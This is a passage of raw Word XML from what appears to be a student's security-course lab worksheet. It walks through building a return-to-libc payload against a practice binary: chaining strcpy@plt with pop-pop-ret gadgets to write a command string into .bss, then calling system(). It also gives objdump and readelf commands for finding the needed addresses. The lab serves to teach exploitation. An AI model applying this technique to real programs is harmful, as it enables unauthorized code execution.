      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>strcpy@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the address of the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function, which will be used to create our desired string by copying one character at a time,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&amp;pop-pop-ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is the address of a pop-pop-ret instruction sequence in our binary,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>str_loc_1</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> is our chosen destination string address,</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>src_byte_addr_i</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is the address containing the byte representation of the i</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:vertAlign w:val="superscript"/>
        </w:rPr>
        <w:t>th</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> character in our target string, and</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>the</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w: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w:t>
      </w:r>
      <w:r>
        <w:t>on the first line is positioned within the payload to overwrite the return address on the stack.</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Briefly describe below what a line in this payload does, and why we need the pop-pop-ret instruction sequence.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="138E9421">
          <v:rect id="_x0000_i1027" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A327C8" w:rsidRDefault="00A327C8">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:t xml:space="preserve">The above line </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>n</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> this payload is to </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>reate</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> an n-byte string beginning at address str_loc_1 and when </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">) is executed the stack is expected to contain return </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>adadress</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>, argument and another argument. The pop-pop-ret is the stack position of returning address.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="651D29F9">
          <v:rect id="_x0000_i1028" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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The new payload we develop will have the following structure.</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rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>PADDING | build-string-payload | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>) | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit_path</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> | &amp;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>cmd_string</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>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We can now gather the addresses we need to build this payload.</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b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 3</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">First, we identify the two addresses that we have found in a past exercise. </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 xml:space="preserve">To find the location of </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>system(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">, use </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objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D ans_check5 | grep system</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 xml:space="preserve">You should see a label </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>system@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and a call instruction that refers to the address at that label. (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is an acronym for procedure linkage table.) This address (the address of the label) is the one we want. Include your transcript below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="18EDB126">
          <v:rect id="_x0000_i1029" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="2" name="Picture 2" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042115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 Adrich\Desktop\CSE523\18\QQ截图2019042115564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rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="036BE0C4">
          <v:rect id="_x0000_i1030" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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 xml:space="preserve">To find the location of an exit path, examine the contents of </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;main&gt;</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> and look for call to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&lt;</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit@plt</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>&gt;</w:t>
      </w:r>
      <w:r>
        <w:t>. You can use a command line like the following.</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objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D ans_check5 | grep -A 20 \&lt;main\&gt;</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lastRenderedPageBreak/>
        <w:t xml:space="preserve">You will see a single instruction preceding the call that puts a constant value of 0 on the stack as an argument to </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>exit</w:t>
      </w:r>
      <w:r>
        <w:t>; use the address of this preceding instruction. Include your transcript below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="08E32863">
          <v:rect id="_x0000_i1031" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="3" name="Picture 3" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042115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 Adrich\Desktop\CSE523\18\QQ截图2019042115570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rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="3D6624EC">
          <v:rect id="_x0000_i1032" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 4</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pP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 xml:space="preserve">Using the method from the previous gate, find the address for the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>libc</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> function </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>strcpy</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>)</w:t>
      </w:r>
      <w:r>
        <w:t>. Include your command line and transcript below.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="33D2CF02">
          <v:rect id="_x0000_i1033" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="4" name="Picture 4" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图20190421155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o Adrich\Desktop\CSE523\18\QQ截图201904211557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rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="29BD22D1">
          <v:rect id="_x0000_i1034" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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Now, we can use the command “</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>objdump</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -D ans_check5 | grep -B 3 ret</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve">”, to find the address of a </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">pop-pop-ret </w:t>
      </w:r>
      <w:r>
        <w:t>instruction sequence within the binary. Include all of the matching 3-instruction sequences that you find in the space below. As a rule of thumb, you might try choosing from among the available options the sequence of instructions that is nearest to the quiet exit path you chose above. Whichever address you choose, underline it to make it easier to spot later.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="65E54234">
          <v:rect id="_x0000_i1035" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="5" name="Picture 5" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图20190421155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o Adrich\Desktop\CSE523\18\QQ截图2019042115580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r>
        <w:pict w14:anchorId="242E3FEF">
          <v:rect id="_x0000_i1036" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00A32DAA">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00AC696B">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>GATE 5</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Next, we will choose an address to serve as our string destination. Our chosen address needs to be stable, readable &amp; writable, and capable of being safely overwritten. There are several address space locations we could choose, but in our example we will consider the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> section of the address space.</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 xml:space="preserve">We can find this address with the </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t>readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:t>utility which we have used in the past. Execute the following command, and include your output below.</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readelf</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New" w:cs="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve"> -S ans_check5</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="72B893FF">
          <v:rect id="_x0000_i1037" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w:rsidR="00CF1FB9" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r w:rsidRPr="00CF1FB9">
        <w:rPr>
          <w:noProof/>
          <w:lang w:val="en-US"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5943600" cy="4929229"/>
            <wp:effectExtent l="0" t="0" r="0" b="5080"/>
            <wp:docPr id="6" name="Picture 6" descr="C:\Users\Po Adrich\Desktop\CSE523\18\QQ截图2019042115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o Adrich\Desktop\CSE523\18\QQ截图201904211558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r>
        <w:pict w14:anchorId="4152D95F">
          <v:rect id="_x0000_i1038" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pic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The output above indicates the start address of the .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> section. This is a location in memory that will be safe for us to write at run-time (</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ie</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">, writing it alone won’t influence program execution). However, rather than using that exact address as our string destination address, we will choose the next highest address that ends with 01 (this is so that we do not have to use an address ending in 00, which would prematurely terminate the string meant to contain our payload). </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For example, if the start address of .</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>bss</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> is 0x0804a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>28</w:t>
      </w:r>
      <w:r>
        <w:t>, we would use 0x0804a0</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>31</w:t>
      </w:r>
      <w:r>
        <w:t xml:space="preserve"> as our string destination address.  Write your chosen address between the following lines.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A32DAA" w:rsidRDefault="00CF1FB9">
      <w:pPr>
        <w:pBdr>
          <w:top w:val="nil"/>
          <w:left w:val="nil"/>
          <w:bottom w:val="nil"/>
          <w:right w:val="nil"/>
          <w:between w:val="nil"/>
        </w:pBdr>
      </w:pPr>
      <w:r>
        <w:pict w14:anchorId="5183E9C3">
